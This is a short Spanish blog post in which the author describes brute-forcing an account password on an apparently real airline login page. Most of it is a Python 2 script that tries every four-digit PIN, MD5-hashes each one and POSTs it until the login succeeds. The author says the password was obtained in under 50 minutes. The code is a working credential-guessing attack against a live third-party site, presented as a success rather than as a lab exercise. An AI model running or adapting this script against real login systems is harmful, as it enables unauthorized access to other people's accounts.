Python brute force

Para acelerar el proceso de brute forcing utilicé el primer script en mi PC y el otro lo ejecuté en un servidor shell que tengo en el mundo exterior con Python instalado, por lo que en menos de 50 minutos la contraseña estaba en mis manos.

import urllib
import urllib2
import md5
import random
import time

abc = "0123456789";
url = "http://aerolinea.vuelefeliz.com/login"
new_passwd = 0

for i1 in range(0, len(abc)):
var0 = abc[i1]
for i2 in range(0, len(abc)):
var1 = abc[i2]
for i3 in range(0, len(abc)):
var2 = abc[i3]
for i4 in range(0, len(abc)):
var3 = abc[i4]
passwd = var0 + var1 + var2 + var3
print "- Password: " + passwd
try:
values={'Aer_Id':'MTYyMA==', #esto es el usuario cifrado con md5
'Aer_Passwd':md5.new(passwd).digest().encode("hex")} #password tambien cifrada con md5
print "- Aer_Passwd: " + md5.new(passwd).digest().encode("hex")

data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)

html = response.read()
if(html.find("Login was unsuccessful") > 0):
print "Nothing of nothing...\n"
else:
#si encuentra la password la guarda en un archivo llamado passwd_found
print "Password found!\n"
arch = open("passwd_found", "w")
arch.write(passwd)
arch.close()
exit()
except:
print "Error...\n"

0 pensamientos:

Post a Comment

feedback!